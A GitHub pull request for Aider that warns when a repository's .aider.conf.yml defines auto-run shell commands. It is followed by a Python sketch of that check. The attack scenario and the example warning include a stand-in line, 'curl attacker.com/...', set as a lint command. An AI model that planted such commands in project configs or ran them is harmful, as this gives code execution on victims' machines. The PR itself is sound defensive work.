Security: Add warning for shell commands in workspace configs #4918

Open
Apoorv13 wants to merge 1 commit into Aider-AI:main from Apoorv13:security/workspace-config-warning

@Apoorv13

Summary

Adds a security warning when .aider.conf.yml files from workspace directories contain shell command configurations (lint-cmd, test-cmd, notifications-command).

Problem

Malicious repositories can include .aider.conf.yml with arbitrary shell commands that execute automatically when users make code changes (since auto-lint: true is the default). Users receive no warning about this risk.

Attack scenario:

  1. Attacker creates repo with malicious .aider.conf.yml
  2. Victim clones and runs aider main.py
  3. Victim makes any code change ("add a docstring")
  4. Attacker's lint-cmd executes silently

Solution

  • Detect shell commands in workspace configs at startup
  • Display clear warning showing which file and commands
  • Home directory config (~/.aider.conf.yml) is trusted
  • Suggest --no-auto-lint --no-auto-test to disable

Example Warning

 Security Warning: Workspace config contains shell commands
   Config file: /path/to/repo/.aider.conf.yml
   Commands that will execute:
     lint-cmd: python: curl attacker.com/...

   These commands run automatically when you make code changes.
   If you didn't create this config, the repository may be malicious.
   Use --no-auto-lint --no-auto-test to disable automatic execution.

Testing

  • Verified warning triggers for workspace configs with shell commands
  • Verified home directory configs are trusted (no warning)
  • No breaking changes to existing workflows

Adds a security warning when .aider.conf.yml files from workspace
directories contain shell command configurations (lint-cmd, test-cmd,
notifications-command). These commands execute automatically via auto-lint
which is enabled by default.

- Warns users about potential malicious workspace configs
- Shows which config file and commands will execute
- Home directory configs are trusted (no warning)
- Suggests --no-auto-lint --no-auto-test to disable
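
A sketch of the startup check the description outlines, as an added example that is not the PR's code or aider's own. It assumes the config has already been parsed into a dict and that a command value may be a single string or a list; the function names and sample values are hypothetical.

```python
from pathlib import Path

# Keys named in the PR description whose values are run as shell commands.
SHELL_KEYS = ("lint-cmd", "test-cmd", "notifications-command")


def is_trusted(config_path, home):
    """Only the config file sitting directly in the home directory is trusted."""
    return Path(config_path).resolve() == (Path(home) / ".aider.conf.yml").resolve()


def shell_commands(config):
    """Return (key, command) pairs; a value may be one string or a list."""
    found = []
    for key in SHELL_KEYS:
        value = config.get(key)
        if not value:
            continue
        for cmd in value if isinstance(value, list) else [value]:
            found.append((key, str(cmd)))
    return found


def workspace_warning(config_path, config, home):
    """Build the warning text, or return None when nothing needs flagging."""
    if is_trusted(config_path, home):
        return None
    cmds = shell_commands(config)
    if not cmds:
        return None
    lines = [
        "Security Warning: Workspace config contains shell commands",
        f"  Config file: {config_path}",
        "  Commands that will execute:",
    ]
    lines += [f"    {key}: {cmd}" for key, cmd in cmds]
    lines.append("  Use --no-auto-lint --no-auto-test to disable automatic execution.")
    return "\n".join(lines)


# Constructed sample: a parsed config as it might come from a cloned repository.
SAMPLE = {"lint-cmd": ["python: ./tools/lint.sh"], "test-cmd": "make test", "model": "x"}

if __name__ == "__main__":
    print(workspace_warning("/tmp/repo/.aider.conf.yml", SAMPLE, "/home/alice"))
```

A repository cloned underneath the home directory is still treated as a workspace here, because trust is tied to the exact home config path rather than to any path below it.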